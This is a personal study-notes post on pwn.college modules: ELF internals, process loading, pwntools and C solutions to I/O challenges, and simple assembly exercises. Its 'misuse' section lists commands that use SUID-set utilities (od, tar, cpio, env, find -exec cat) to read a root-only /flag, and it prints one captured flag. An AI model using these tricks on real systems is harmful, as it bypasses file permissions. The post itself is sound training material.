不可视境界线, last modified on the afternoon of April 6, 2023

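Connecting

`ssh -i ~/pwn.college/pwnkey hacker@dojo.pwn.college`

Copying files to the dojo, or pulling them back

`scp -i ~/pwn.college/pwnkey [file] hacker@dojo.pwn.college:`
`scp -i ~/pwn.college/pwnkey hacker@dojo.pwn.college:[file] ./`

You can create a symbolic link to the flag, but no directory other than $HOME is writable, so the link has to live under ~/.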

module 1-communication

The file system

ln -s /old/path /new/path
<in_file:      redirect in_file into the command's input
>out_file:     redirect the command's output into out_file, overwriting it
>>out_file:    redirect the command's output into out_file, appending to it
2>error_file:  redirect the command's errors into error_file, overwriting it
2>>error_file: redirect the command's errors into error_file, appending to it

Binary files

The tutorials are excellent, and the slides work as a detailed reference for the fundamentals. The Binary Files slides are here

ELF base struct: header-sections-segments
symbols
relocations
dynamic-linking

ELF is a binary file format.
Contains the program and its data. Describes how the program should be loaded (program/segment headers). Contains metadata describing program components (section headers).
Sections gather all the information needed to link a given object file and build an executable,
while program headers split the executable into segments with different attributes, which will eventually be loaded into memory.
Section headers are not a necessary part of the ELF; they are just metadata.


$ file /bin/cat 
/bin/cat: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=e6afa43e1e280bd06c018f541c7ae46a2ebda83c, for GNU/Linux 3.2.0, stripped

Several ways to dig in (CSAPP covers these too, but I skipped over them when I first read it):
- gcc to make your ELF.
- readelf to parse the ELF header.
- objdump to parse the ELF header and disassemble the machine code.
- nm to view your ELF’s symbols.
- patchelf to change some ELF properties.
- objcopy to swap out ELF sections.
- strip to remove otherwise-helpful information (such as symbols).
- kaitai struct to look through your ELF interactively

ELF base struct

ELF files are composed of three major components:

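ELF Header: contains general information about the binary (readelf -h <executable>)
Sections: comprise all information needed for linking a target object file in order to build a working executable (readelf -S <executable>)
Segments: break down the structure of an ELF binary into suitable chunks to prepare the executable to be loaded into memory (readelf -l <executable>)

The meaning of each section deserves attention; I had to come back and reread .got.plt.

Note that segments play no role at link time, and sections play no role at run time.

On one hand, a segment groups sections together to make loading more efficient; on the other, segments must be aligned to the page size so that permissions can be enforced through the PTEs.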
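
As a rough illustration of what `readelf -h` reads, here is a minimal Python sketch that unpacks the fixed 64-byte ELF64 header. It only handles 64-bit little-endian files, and `make_demo_header` is a hypothetical helper that builds a synthetic header (with zero section headers, which is legal) so the example runs without a real binary.

```python
import struct

# ELF64 file header, little-endian: e_ident[16] followed by 13 fixed-width fields.
ELF64_HEADER = struct.Struct("<16sHHIQQQIHHHHHH")


def parse_elf64_header(data: bytes) -> dict:
    """Parse the ELF64 header found at the start of `data`."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    if data[4] != 2 or data[5] != 1:
        raise ValueError("this sketch only handles 64-bit little-endian ELF")
    (_ident, e_type, e_machine, _version, e_entry, e_phoff, e_shoff,
     _flags, _ehsize, _phentsize, e_phnum, _shentsize, e_shnum,
     _shstrndx) = ELF64_HEADER.unpack_from(data)
    return {
        "type": e_type,        # 2 = ET_EXEC, 3 = ET_DYN (PIE or shared object)
        "machine": e_machine,  # 62 = EM_X86_64
        "entry": e_entry,
        "phoff": e_phoff, "phnum": e_phnum,  # program headers (segments)
        "shoff": e_shoff, "shnum": e_shnum,  # section headers (optional)
    }


def make_demo_header() -> bytes:
    """Hypothetical helper: a synthetic PIE header with no section headers."""
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + bytes(8)
    return ELF64_HEADER.pack(ident, 3, 62, 1, 0x1040, 64, 0, 0, 64, 56, 13, 64, 0, 0)


if __name__ == "__main__":
    print(parse_elf64_header(make_demo_header()))
```

On a real system the same function can be fed `open("/bin/cat", "rb").read(64)`.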

Symbols

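Symbols give linkers and debuggers the interface they need to do their work.

.dynstr is the string table of .dynsym, and the section .strtab is the string table of the .symtab symbol table. Each symbol's st_name field is a byte offset into the matching string table; the number of strings does not have to equal the number of symbols, since unnamed symbols all point at the empty string.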

relocation

Defining Relocations

There are different types of relocatable files:

Generic object files (*.o). Fairly simple: a file meant for static linking.
Kernel object files (*.ko). Left for later.
Shared object files (*.so).
- This type of relocatable file supports being linked at runtime and may be shared across different processes. Consequently, relocations of dynamic dependencies have to be done at runtime. This process is known as Dynamic Linking.

Elfxx_Rel and Elfxx_Rela differ only in the Addend field. For a PC-relative reference, the addend is the negated distance between the location being relocated and the address of the next instruction.
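
To make the addend concrete, here is a small sketch of the x86-64 PC-relative relocation formula S + A - P (symbol address, addend, place being patched). The addresses are made up for illustration; the addend of -4 reflects that the CPU adds the displacement to the address of the next instruction, which starts 4 bytes after the rel32 field.

```python
MASK32 = 0xFFFFFFFF


def pc32_relocation(symbol_addr: int, addend: int, place: int) -> int:
    """R_X86_64_PC32-style value: S + A - P, truncated to 32 bits."""
    return (symbol_addr + addend - place) & MASK32


def resolved_target(place: int, rel32: int) -> int:
    """Address the CPU ends up at: next instruction + sign-extended rel32."""
    if rel32 >= 1 << 31:
        rel32 -= 1 << 32
    return place + 4 + rel32


if __name__ == "__main__":
    # Hypothetical addresses: the rel32 field of a call sits at 0x401150.
    rel = pc32_relocation(symbol_addr=0x401136, addend=-4, place=0x401150)
    print(hex(rel), hex(resolved_target(0x401150, rel)))
```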

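For the rest, just read the original blog post. There is a lot of material and every paragraph has to be understood, but there are only a few relocation entry types, so they are easy to remember.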

Dynamic Linking

Overview

Unlike in static linking, ld requires shared libraries to create a dynamically linked executable.
The output file will contain the executable’s code and the names of the shared libraries required.

When the binary is executed, the dynamic linker will find the required dependencies to load and link them together.

Process

The dynamic linking process begins immediately after execution.

With dynamically linked programs, the system executes the file’s “interpreter”, which is an intermediate program that should set up the environment and only then execute the main binary. The interpreter lies in the PT_INTERP segment created by the compile-time linker (ld).

The dynamic linker will set up the environment using dynamic entries from the .dynamic section:

preparing the environment:

Load the original file’s PT_LOAD segments in memory.
Use the .dynamic section/segment to read dependencies, search for them on disk and load them in memory as well. This is done recursively for dependent libraries—they can be dynamically linked as well. The dependency searching algorithm is outlined in the ld.so man page.
Perform relocations – shared libraries are loaded into non-deterministic addresses and must have absolute addresses patched, as well as resolving references to other object files.
Invoke shared library initialization functions (registered in the .preinit_array, .init, .init_array sections). What happened?
Finally, pass control back to the original binary’s entry point, making it seem to the binary that control was passed directly from exec.

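LD_PRELOAD and LD_LIBRARY_PATH are covered as well... better to read the original.

Lazy Linking

The motivation for lazy linking: if a program hits an error at startup and exits immediately, all of the relocation work performed by the dynamic linker is rendered useless, so part of the linking work is deferred until a function is actually called.

I had already seen this in CSAPP and it is basically the same; the difference is that this write-up also shows how it looks in IDA.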

Process Loading

A process is created.

by fork() or clone() and execve().
Cat is loaded.
- must be executable
  
  To figure out what to load, the Linux kernel reads the beginning of the file (i.e., /bin/cat), and makes a decision:
- If the file starts with #!, the kernel extracts the interpreter from the rest of that line and executes this interpreter with the original file as an argument.
- If the file matches a format in /proc/sys/fs/binfmt_misc, the kernel executes the interpreter specified for that format with the original file as an argument.
- If the file is a dynamically-linked ELF, the kernel reads the interpreter/loader defined in the ELF, loads the interpreter and the original file, and lets the interpreter take control.
- If the file is a statically-linked ELF, the kernel will load it.
- Other legacy file formats are checked for.
  
  notice the interpreter specified in .interp section.
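
The first-bytes decision above can be sketched in a few lines of Python. This is a simplification under stated assumptions: it only looks at the `#!` and `\x7fELF` magic values, ignores binfmt_misc and legacy formats, and `classify_executable` is a name invented for this example.

```python
def classify_executable(head: bytes) -> str:
    """Classify a file from its first bytes, roughly as the kernel does."""
    if head.startswith(b"#!"):
        # The rest of the first line names the interpreter (plus an optional argument).
        line = head[2:].split(b"\n", 1)[0].strip()
        return "script:" + line.decode()
    if head.startswith(b"\x7fELF"):
        return "elf"
    return "other"


if __name__ == "__main__":
    print(classify_executable(b"#!/bin/sh\necho hi\n"))
    print(classify_executable(b"\x7fELF\x02\x01\x01"))
```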
  
  Dynamically linked ELFs: the loading process
- The program and its interpreter are loaded by the kernel.
- The interpreter locates the libraries.
  a. LD_PRELOAD environment variable, and anything in /etc/ld.so.preload
  b. LD_LIBRARY_PATH environment variable (can be set in the shell)
  c. DT_RUNPATH or DT_RPATH specified in the binary file (both can be modified with patchelf)
  d. system-wide configuration (/etc/ld.so.conf)
  e. /lib and /usr/lib
- The interpreter loads the libraries.
  a. these libraries can depend on other libraries, causing more to be loaded
  b. relocations updated
Cat is initialized.

/proc/self/maps and __attribute__((constructor))

Process Execution

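The video demonstrates a great deal on the command line, most of which I had never seen; I try to record some of the details. (Google Docs)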

Cat is launched.
Cat reads its arguments and environment.
Cat does its thing.
Cat terminates.

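The four steps above are the flow this part covers, and I follow it in order:

Cat is launched

__libc_start_main(): this function again. Before it comes _start(), giving the flow _start() -> __libc_start_main() -> main().

You can set LD_PRELOAD to override functions such as __libc_start_main().

Cat reads arg & env

This is covered in the next section; the video demonstrates an example of changing an environment variable.

Running ls with the environment variable LANG=C makes it sort by ASCII code; otherwise it sorts according to the system default, en_US.UTF-8.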

Cat does thing

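Covers library functions, system calls, signals, and shared memory.

Symbols can be inspected with nm, and strace is demonstrated. libc functions can be called without including their headers, at the cost of an implicit-declaration warning; man tells you which header to include.

The signal demo uses ps and pgrep; from the ps manual I learned that its options come in three styles. The shared-memory demo uses /dev/shm, which I do not yet know how to use.

There is also process termination, which matches what I saw in my operating systems course, so I will not repeat it.

The rest is in the slides.

Command-line arguments and environment variables

`int main(int argc, char **argv, char **envp)`

These are main's parameters. argv and envp are pointers to arrays of strings, hence double pointers, and the last element of each array is NULL.

Like this: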

$ gcc -o test test.c
$ ./test testing
The number of arguments is: 2

First arg:     The program name is: ./test
Second arg: The first argument is: testing

The first environment variable is: PWD=/home/yans # process working directory
The second environment variable is: SHLVL=1

env runs a command with a modified environment. It can also set specific environment variables.

`$ env -i ./countenv`
`There are 0 environment variables.`
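
The same effect as `env -i` can be had from Python by passing an explicit `env` mapping to the child. A minimal sketch, assuming a Linux system where `/usr/bin/env` exists; `child_env_lines` is a helper name invented here, and the child is `env` itself because it simply prints the environment it receives.

```python
import subprocess


def child_env_lines(env: dict) -> list:
    """Run /usr/bin/env with exactly `env` and return the lines it prints."""
    result = subprocess.run(
        ["/usr/bin/env"], env=env, capture_output=True, check=True
    )
    return result.stdout.decode().splitlines()


if __name__ == "__main__":
    print(len(child_env_lines({})), "environment variables")
    print(child_env_lines({"FOO": "bar"}))
```

Passing `env={}` is the important part: leaving `env` out makes the child inherit the parent's whole environment.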

PIPE

#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

struct subprocess {
    pid_t pid;
    int in_fd;   // write end of the child's stdin pipe
    int out_fd;  // read end of the child's stdout pipe
    int err_fd;  // read end of the child's stderr pipe
};
void close_fd(int fd) {
    if (close(fd) == -1) { perror("Could not close pipe end"); exit(1); }
}
void mk_pipe(int fds[2]) {
    if (pipe(fds) == -1) { perror("Could not create pipe"); exit(1); }
}
void mv_fd(int fd1, int fd2) {
    if (dup2(fd1, fd2) == -1) { perror("Could not duplicate pipe end"); exit(1); }
    close_fd(fd1);
}

// Start program at argv[0] with arguments argv.
// Set up new stdin, stdout and stderr.
// Puts references to new process and pipes into `p`.
void call(char* argv[], struct subprocess * p) {
    int child_in[2]; int child_out[2]; int child_err[2];
    mk_pipe(child_in); mk_pipe(child_out); mk_pipe(child_err);
    pid_t pid = fork();
    if (pid == -1) { perror("Could not fork"); exit(1); }
    if (pid == 0) {
        close_fd(child_in[1]); close_fd(child_out[0]); close_fd(child_err[0]); // unused child pipe ends
        mv_fd(child_in[0], 0); mv_fd(child_out[1], 1); mv_fd(child_err[1], 2); // dup2 replaces fds 0-2
        char* envp[] = { NULL };      // empty environment
        execve(argv[0], argv, envp);
        perror("failure in exec");    // only reached if execve fails
        _exit(1);
    } else {
        close_fd(child_in[0]); close_fd(child_out[1]); close_fd(child_err[1]); // unused child pipe ends
        p->pid = pid;
        p->in_fd = child_in[1];   // parent wants to write to subprocess child_in
        p->out_fd = child_out[0]; // parent wants to read from subprocess child_out
        p->err_fd = child_err[0]; // parent wants to read from subprocess child_err
    }
}

int main(void) {
    printf("Hello from parent process!\n");
    struct subprocess proc;
    char* argv[] = {"/challenge/embryoio_level40", NULL};
    call(argv, &proc);
//    mv_fd(STDIN_FILENO, proc.in_fd);
//    mv_fd(STDOUT_FILENO, proc.out_fd);
    char buf[2048];
    char buf_[2048];
    ssize_t n = read(proc.out_fd, buf, sizeof buf - 1);
    buf[n > 0 ? n : 0] = '\0';    // read() does not NUL-terminate
    ssize_t m = read(proc.err_fd, buf_, sizeof buf_ - 1);
    buf_[m > 0 ? m : 0] = '\0';
    printf("%s\n", buf);
    printf("%s\n", buf_);
    waitpid(proc.pid, NULL, 0);

    return 0;
}

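Reference docs

There really are a lot; see here

There is a pwntools-cheatsheet that stands out and should come in handy

WP

How can there be more than a hundred of them? That is absurd

Basic connection method: ssh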

ssh-keygen -f pwnkey
cat pwnkey.pub #copy public key
ssh -i pwnkey hacker@dojo.pwn.college -v

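The challenge is at /challenge/[corresponding file]; just run it

Copying a file from the remote machine:

`scp -i pwnkey hacker@dojo.pwn.college:/challenge/checker.py ./`

level (which one was it?)

The program must be run with zero environment variables. Three approaches work: the execve function, the env command, and the exec command

The rest are mostly simple challenges: add an environment variable, add an argument, put it in a script, and so on

level15: something new

A new tool: ipython, an enhanced interactive Python with some extra features. Its built-in help text is reproduced at the end of this level.

After connecting over ssh, start ipython; Ctrl+O then lets you edit a multi-line script. It still uses pwntools, so it is somewhat familiar.

There are two approaches:

!exec /challenge/embryoio_level15
use pwn.process()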

IPython -- An enhanced Interactive Python

IPython offers a fully compatible replacement for the standard Python
interpreter, with convenient shell features, special commands, command
history mechanism and output results caching.

At your system command line, type ‘ipython -h’ to see the command line
options available. This document only describes interactive features.

GETTING HELP

Within IPython you have various way to access help:

? -> Introduction and overview of IPython’s features (this screen).
object? -> Details about ‘object’.
object?? -> More detailed, verbose information about ‘object’.
%quickref -> Quick reference of all IPython specific syntax and magics.
help -> Access Python’s own help system.

If you are in terminal IPython you can quit this screen by pressing q.

MAIN FEATURES

Access to the standard Python help with object docstrings and the Python
manuals. Simply type ‘help’ (no quotes) to invoke it.
Magic commands: type %magic for information on the magic subsystem.
System command aliases, via the %alias command or the configuration file(s).
Dynamic object information:

Typing ?word or word? prints detailed information about an object. Certain
long strings (code, etc.) get snipped in the center for brevity.

Typing ??word or word?? gives access to the full information without
snipping long strings. Strings that are longer than the screen are printed
through the less pager.

The ?/?? system gives access to the full source code for any object (if
available), shows function prototypes and other useful information.

If you just want to see an object’s docstring, type ‘%pdoc object’ (without
quotes, and without % if you have automagic on).
Tab completion in the local namespace:

At any time, hitting tab will complete any available python commands or
variable names, and show you a list of the possible completions if there’s
no unambiguous one. It will also complete filenames in the current directory.
Search previous command history in multiple ways:
- Start typing, and then use arrow keys up/down or (Ctrl-p/Ctrl-n) to search
  through the history items that match what you’ve typed so far.
- Hit Ctrl-r: opens a search prompt. Begin typing and the system searches
  your history for lines that match what you’ve typed so far, completing as
  much as it can.
- %hist: search history by index.
Persistent command history across sessions.
Logging of input with the ability to save and restore a working session.
System shell with !. Typing !ls will run ‘ls’ in the current directory.
The reload command does a ‘deep’ reload of a module: changes made to the
module since you imported will actually be available without having to exit.
Verbose and colored exception traceback printouts. See the magic xmode and
xcolor functions for details (just type %magic).
Input caching system:

IPython offers numbered prompts (In/Out) with input and output caching. All
input is saved and can be retrieved as variables (besides the usual arrow
key recall).

The following GLOBAL variables always exist (so don’t overwrite them!):
_i: stores previous input.
_ii: next previous.
_iii: next-next previous.
_ih : a list of all input _ih[n] is the input from line n.

Additionally, global variables named _i<n> are dynamically created (<n>
being the prompt counter), such that _i<n> == _ih[<n>]

For example, what you typed at prompt 14 is available as _i14 and _ih[14].

You can create macros which contain multiple input lines from this history,
for later re-execution, with the %macro function.

The history function %hist allows you to see any part of your input history
by printing a range of the _i variables. Note that inputs which contain
magic functions (%) appear in the history with a prepended comment. This is
because they aren’t really valid Python code, so you can’t exec them.
Output caching system:

For output that is returned from actions, a system similar to the input
cache exists but using _ instead of _i. Only actions that produce a result
(NOT assignments, for example) are cached. If you are familiar with
Mathematica, IPython’s _ variables behave exactly like Mathematica’s %
variables.

The following GLOBAL variables always exist (so don’t overwrite them!):
_ (one underscore): previous output.
__ (two underscores): next previous.
___ (three underscores): next-next previous.

Global variables named _<n> are dynamically created (<n> being the prompt
counter), such that the result of output <n> is always available as _<n>.

Finally, a global dictionary named _oh exists with entries for all lines
which generated output.
Directory history:

Your history of visited directories is kept in the global list _dh, and the
magic %cd command can be used to go to any entry in that list.
Auto-parentheses and auto-quotes (adapted from Nathan Gray’s LazyPython)
1. Auto-parentheses
  
  Callable objects (i.e. functions, methods, etc) can be invoked like
  this (notice the commas between the arguments)::
```
 In [1]: callable_ob arg1, arg2, arg3
```
  and the input will be translated to this::
```
 callable_ob(arg1, arg2, arg3)
```
  This feature is off by default (in rare cases it can produce
  undesirable side-effects), but you can activate it at the command-line
  by starting IPython with --autocall 1, set it permanently in your
  configuration file, or turn on at runtime with %autocall 1.
  
  You can force auto-parentheses by using ‘/‘ as the first character
  of a line. For example::
```
  In [1]: /globals             # becomes 'globals()'
```
  Note that the ‘/‘ MUST be the first character on the line! This
  won’t work::
```
  In [2]: print /globals    # syntax error
```
  In most cases the automatic algorithm should work, so you should
  rarely need to explicitly invoke /. One notable exception is if you
  are trying to call a function with a list of tuples as arguments (the
  parenthesis will confuse IPython)::
```
  In [1]: zip (1,2,3),(4,5,6)  # won't work
```
  but this will work::
```
 In [2]: /zip (1,2,3),(4,5,6)
 ------> zip ((1,2,3),(4,5,6))
 Out[2]= [(1, 4), (2, 5), (3, 6)]
```
  IPython tells you that it has altered your command line by
  displaying the new command line preceded by -->. e.g.::
```
 In [18]: callable list
 -------> callable (list)
```
2. Auto-Quoting
  
  You can force auto-quoting of a function’s arguments by using ‘,’ as
  the first character of a line. For example::
```
  In [1]: ,my_function /home/me   # becomes my_function("/home/me")
```
  If you use ‘;’ instead, the whole argument is quoted as a single
  string (while ‘,’ splits on whitespace)::
```
  In [2]: ,my_function a b c   # becomes my_function("a","b","c")
  In [3]: ;my_function a b c   # becomes my_function("a b c")
```
  Note that the ‘,’ MUST be the first character on the line! This
  won’t work::
```
  In [4]: x = ,my_function /home/me    # syntax error
```

level16

From this challenge on I use the script below. glob finds all path names matching a pattern, following the rules of the Unix shell

import glob
import pwn
p = pwn.process(glob.glob("/challenge/embryo*"), stdout=pwn.PIPE, stdin=pwn.PIPE)
p.sendline(b"password")    # this line is required
print(p.read().decode())

level17

This challenge checks argv[1]. Note that I used to call pwntools' process as process("file/path"), which really just fills in argv[0]; when executable (path to the binary to execute) is None, pwntools runs argv[0], which is why passing only a path works.

Written like this:

import glob 
import pwn 
p= pwn.process(glob.glob("/challenge/embryo*")+["gdncphvdkz"] , stdout=pwn.PIPE, stdin=pwn.PIPE) 

print(p.read().decode())

level18-21

18: An environment variable; just add env={"balabala": "blabla"} to the arguments of process.
19: Redirect stdin.

import glob
import pwn
with open("/tmp/rmxgbo", "w") as o:
    o.write("kmtxemmo\n")
p= pwn.process(glob.glob("/challenge/embryo*"), stdout=pwn.PIPE, stdin=open("/tmp/rmxgbo"))

print(p.read().decode())

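One open question: the code above should all be correct, but the last two lines with the flag only appear after adding p.interactive(). I have not tracked down the cause; a likely explanation is that p.read() returns as soon as some output is available instead of waiting for EOF, in which case p.readall() should also work.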

import glob
import pwn
p= pwn.process(glob.glob("/challenge/embryo*"), stdout=open("/tmp/tkpich", "w"), stdin=pwn.PIPE)

21
The environment has to be emptied.
Note that env in process() inherits Python's environment by default, so it must be cleared explicitly

import glob,pwn
p= pwn.process(glob.glob("/challenge/embryo*"), stdout=pwn.PIPE, stdin=pwn.PIPE, env={})

print(p.read().decode())

level 22-28

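22: In this part the program is launched from a Python script run on the command line; fairly simple.

import glob,pwn
p= pwn.process(glob.glob("/challenge/embryo*"))
p.interactive()

23-28: Repeat the same work as above, e.g. zero environment variables, redirecting stdin and stdout, and so on.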

level 29-34

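Starting here, C programs have to be compiled. For 29, write the snippet below; 30 takes a password as input.

Note that calling execve directly, without forking, leaves bash as the challenge's parent process.

Without waitpid, the child gets reparented to /docker/init (on my Ubuntu 20.04 it is /sbin/init).

#include <stdio.h>
#include <unistd.h>
#include <sys/wait.h>

int pwncollege(){return 0;}
int main(int argc, char* argv[], char** envp)
{
    pid_t pid = fork();
    if(pid == 0){//child process
        int r=execve("/challenge/embryoio_level30", argv, envp);
        printf("%d\n", r);  // only reached if execve fails
    }else{
        waitpid(pid, NULL, 0);
    }
    printf("Parent process terminated.\n");
    return 0;
}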

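31: Unbelievable. The "a" was originally written as "", and even the parent-process check failed; a while later I recompiled and it worked again, for no obvious reason.

#include <stdio.h>
#include <unistd.h>
#include <sys/wait.h>
int pwncollege(){return 0;}
int main(int argc, char** argv, char** envp)
{
    pid_t pid = fork();

    if(pid == 0){//child process
        //int r=execve("/challenge/embryoio_level31", argv, envp);
        int r = execl("/challenge/embryoio_level31", "", "lndhvgwxjx", (char *)NULL);
        printf("%d\n", r);  // only reached if execl fails
    }else{
        waitpid(pid, NULL, 0);
    }
    printf("Parent process terminated.\n");
    return 0;
}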

32: Modifying envp directly seems to cause problems, reason unknown.

#include <stdio.h>
#include <unistd.h>
#include <sys/wait.h>
int pwncollege(){return 0;}
int main(int argc, char** argv, char** envp)
{
    pid_t pid = fork();
    char* argvs[3];                  // despite the name, this is the child's environment
    argvs[1]="jxdefy=fbilpksemj";    // set by hand for now
    argvs[2]=NULL;
    argvs[0]="sldkfj";
    if(pid == 0){//child process
        int r = execle("/challenge/embryoio_level32", "a", "lndhvgwxjx", (char *)NULL, argvs);
        printf("%d\n", r);  // only reached if execle fails
    }else{
        waitpid(pid, NULL, 0);
    }
    printf("Parent process terminated.\n");
    return 0;
}

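33: This is the C version of redirection, with the parent-process check thrown in. Since the exec family of functions keeps most attributes of the calling process, such as its input and output streams, it is enough to redirect the C program itself; the child inherits the redirection.
34: Output redirection.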

level35-

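35: Run it from a script; no fork needed, just execve directly
36: The output has to go to a pipe into cat; just type ./c | cat on the command line
37: ./c | grep -E "*" and done
38: ./c | sed "="
39: ./c | rev | rev
40: Redirect stdin through a pipe. I looked into pipe handling in C, but have not yet figured out how to apply it to this challenge.

~~Go straight for three levels of nesting, so that cat does not terminate right away~~. Never mind, it works without that; I overcomplicated it.

`./cat | cat | /challenge/embryoio_level40`

//cat.
#include <fcntl.h>
#include <unistd.h>

int main(int argc, char **argv)
{
    char buf[1024];
    int n;
    int fd = argc == 1 ? 0 : open(argv[1], O_RDONLY);
    while ((n = read(fd,buf,1024)) > 0 && write(1,buf,n) > 0);
}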

41: Redirect stdout. Same approach.
42: bash x.sh | cat
43: grep
44: sed
45: rev
46: I am tired

level??

import glob
import pwn
pwn.context.log_level = "DEBUG"
p2 = pwn.process(["/usr/bin/sed", "-e", "s/x/x/"])
p1 = pwn.process(glob.glob("/challenge/embryo*"), stdout=p2.stdin)
print(p2.readall())
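
For comparison, the same producer-to-consumer wiring can be sketched with only the standard library. This is not the pwntools script above: the producer here is a throwaway Python one-liner standing in for the challenge binary, the consumer is `cat`, and `run_pipeline` is a name made up for the example.

```python
import subprocess
import sys


def run_pipeline(text: str) -> bytes:
    """Equivalent of `producer | cat`: connect one child's stdout to another's stdin."""
    producer = subprocess.Popen(
        [sys.executable, "-c", "import sys; sys.stdout.write(sys.argv[1])", text],
        stdout=subprocess.PIPE,
    )
    consumer = subprocess.Popen(
        ["cat"], stdin=producer.stdout, stdout=subprocess.PIPE
    )
    # Drop the parent's copy of the pipe so cat sees EOF when the producer exits.
    producer.stdout.close()
    out, _ = consumer.communicate()
    producer.wait()
    return out


if __name__ == "__main__":
    print(run_pipeline("hello through a pipe\n"))
```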

module 2-misuse

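File permissions

WP

The challenges in this part are all about using a program with the SUID bit set to read a file with root privileges, however unlikely it looks that the program could do so.

cat head tail rev nano emacs vim od more less sort hd(hexdump) xxd base32(64) split gzip bzip2 zip&unzip
tar ar cpio genisoimage env find make

od: od -t x8z -v -w 10 /flag, then piece the flag together by hand.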

0000000 6c6c6f632e6e7770 714f6f417b656765 685834544b387868 4e354550757a575a  >pwn.college{AoOqhx8KT4XhZWzuPE5N<
0000040 2e337a6d50723671 4d734d54557a5851 0a7d577a49314d54                   >q6rPmz3.QXzUTMsMTM1IzW}.<
0000070
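
Piecing the flag together by hand amounts to reversing the bytes of each 8-byte word, because `x8` prints every word as one little-endian integer. A short sketch, using the first two words of the dump above as input (`decode_od_words` is a name invented for the example):

```python
def decode_od_words(words):
    """Turn `od -t x8` hex words back into the original byte stream."""
    # Each word is printed most-significant byte first, so reverse it.
    return b"".join(bytes.fromhex(word)[::-1] for word in words)


if __name__ == "__main__":
    print(decode_od_words(["6c6c6f632e6e7770", "714f6f417b656765"]))
```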

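hd /flag (hexdump)
xxd -c60 /flag (60 bytes per line)
base32 /flag | base32 -d
split: split a file into pieces. split /flag
gzip -c /flag | gzip -cd
bzip2 uses a newer mechanism, but its command-line options are very close to gzip's
zip - /flag > aa, then cat aa or unzip -p aa
tar cf flag.tar flag, then tar -xOf flag.tar. I studied tar's options for a long while: one of the main-operation options must be given every time, and the f option must be followed immediately by the file name
ar c flag.ar flag, then cat flag.ar. It turns out that once the archive is created as root, it is readable by other users right away... even simpler
(23- ) cpio genisoimage: ???
- echo "/flag" | cpio -ov > ~/flag.cpio, then cat flag.cpio. You do not feed /flag itself into cpio's stdin... it only wants a name list...
env works too? Amazing. env cat /flag
find /flag -maxdepth 0 -exec cat '{}' \;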

module 3-asm

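This module is all about writing assembly

3 Simple multiplication

Note that mul takes the multiplicand implicitly from rax and the multiplier from the operand we specify; the result is the concatenation RDX:RAX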

import sys
from pwn import * 
from glob import *
context.log_level = 'debug'
context.arch = 'amd64'
p = process(glob("/challenge/e*"))

shellcode="""
mov rax, rdi
mov rcx, rdx
mul rsi
add rax, rcx

"""
p.send(asm(shellcode))
p.interactive()

4-5 Division

div takes the dividend in RDX:RAX and the divisor as its operand; the quotient ends up in RAX and the remainder in RDX
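
The register pairing used by mul and div can be modelled with Python integers. This is only a model of the unsigned 64-bit forms, with function names chosen for this sketch; the real `div` raises a divide error when the quotient does not fit in 64 bits, which is mirrored here with an exception.

```python
MASK64 = (1 << 64) - 1


def mul64(rax: int, operand: int):
    """Unsigned `mul operand`: returns (rdx, rax), the high and low halves."""
    product = (rax & MASK64) * (operand & MASK64)
    return product >> 64, product & MASK64


def div64(rdx: int, rax: int, operand: int):
    """Unsigned `div operand`: divides RDX:RAX, returns (rax=quotient, rdx=remainder)."""
    dividend = ((rdx & MASK64) << 64) | (rax & MASK64)
    quotient, remainder = divmod(dividend, operand & MASK64)
    if quotient > MASK64:
        raise OverflowError("quotient does not fit in rax (the CPU raises #DE)")
    return quotient, remainder


if __name__ == "__main__":
    print(mul64(1 << 63, 4))   # the high half lands in rdx
    print(div64(0, 17, 5))     # rdx must be cleared for a plain 64-bit dividend
```

The second call shows why stale data in rdx matters: whatever is left there becomes the upper 64 bits of the dividend.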

shellcode="""
mov rax, rdi
xor edx, edx    /* the dividend is RDX:RAX, so clear the high half first */
div rsi
mov rax, rdx
"""

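6: Names of the low sub-registers

Pay close attention to the names of the low sub-registers; I got the one for rdi wrong. If the two operands of mov differ in size, the assembler reports: unsupported instruction 'mov'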

Name	Notes	Type	64	32	16	8
rax	Values are returned from functions in this register.	scratch	rax	eax	ax	ah and al
rcx	Typical scratch register. Some instructions also use it as a counter.	scratch	rcx	ecx	cx	ch and cl
rdx	Scratch register.	scratch	rdx	edx	dx	dh and dl
rbx	Preserved register: don’t use it without saving it!	preserved	rbx	ebx	bx	bh and bl
rsp	The stack pointer. Points to the top of the stack (details coming soon!)	preserved	rsp	esp	sp	spl
rbp	Preserved register.	preserved	rbp	ebp	bp	bpl
rsi	Scratch register. Function argument #2 in 64-bit Linux	scratch	rsi	esi	si	sil
rdi	Scratch register. Function argument #1 in 64-bit Linux	scratch	rdi	edi	di	dil
r8	Scratch register. These were added in 64-bit mode	scratch	r8	r8d	r8w	r8b
r9	Scratch register.	scratch	r9	r9d	r9w	r9b
r10	Scratch register.	scratch	r10	r10d	r10w	r10b
r11	Scratch register.	scratch	r11	r11d	r11w	r11b
r12	Preserved register. You can use it, but you need to save and restore it.	preserved	r12	r12d	r12w	r12b
r13	Preserved register.	preserved	r13	r13d	r13w	r13b
r14	Preserved register.	preserved	r14	r14d	r14w	r14b
r15	Preserved register.	preserved	r15	r15d	r15w	r15b

shellcode="""
mov al, dil
mov bx, si
"""

8-9 bitwise op

8.
shellcode="""
xor rax, rax
or  rax, rdi
and rax, rsi
"""

9.
shellcode="""
and rdi, 1
xor rdi, 1
xor rax, rax
or rax, rdi
"""

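10. Starting memory operations

Note that add does have an add mem, imm form (it just needs an explicit operand size, e.g. add qword ptr [rdx], 0x1337); what x86 lacks is a memory-to-memory form. Here the old value is also needed in rax, so it is loaded into a register first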

shellcode=""" 
mov rdx, 0x404000 
mov rcx, [rdx] 
mov rax, rcx 
add rcx, 0x1337 
mov [rdx], rcx 
"""

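11. Simple use of rax, eax, ax, ah, and al.

12. There is no mov m64, imm64 encoding (a store takes at most a sign-extended 32-bit immediate), so a 64-bit constant has to be moved into a register first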

shellcode="""
mov rax, 0xdeadbeef00001337
mov rbx, 0x000000C0FFEE0000
mov [rdi], rax
mov [rsi], rbx
"""

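13. Using address offsets; simple.

14-16. Stack instructions. Too simple, all basic exercises; once solved, moving on

17. Jumps

I miscounted the nops. The statement says 0x51 bytes from the current position, but that means from the address of the instruction after the jmp, not from the start of the jmp itself...

Also note that an absolute jump has to be an indirect jump (the jmp rcx line), whereas conditional jumps can only be direct; keep the two rules together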
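
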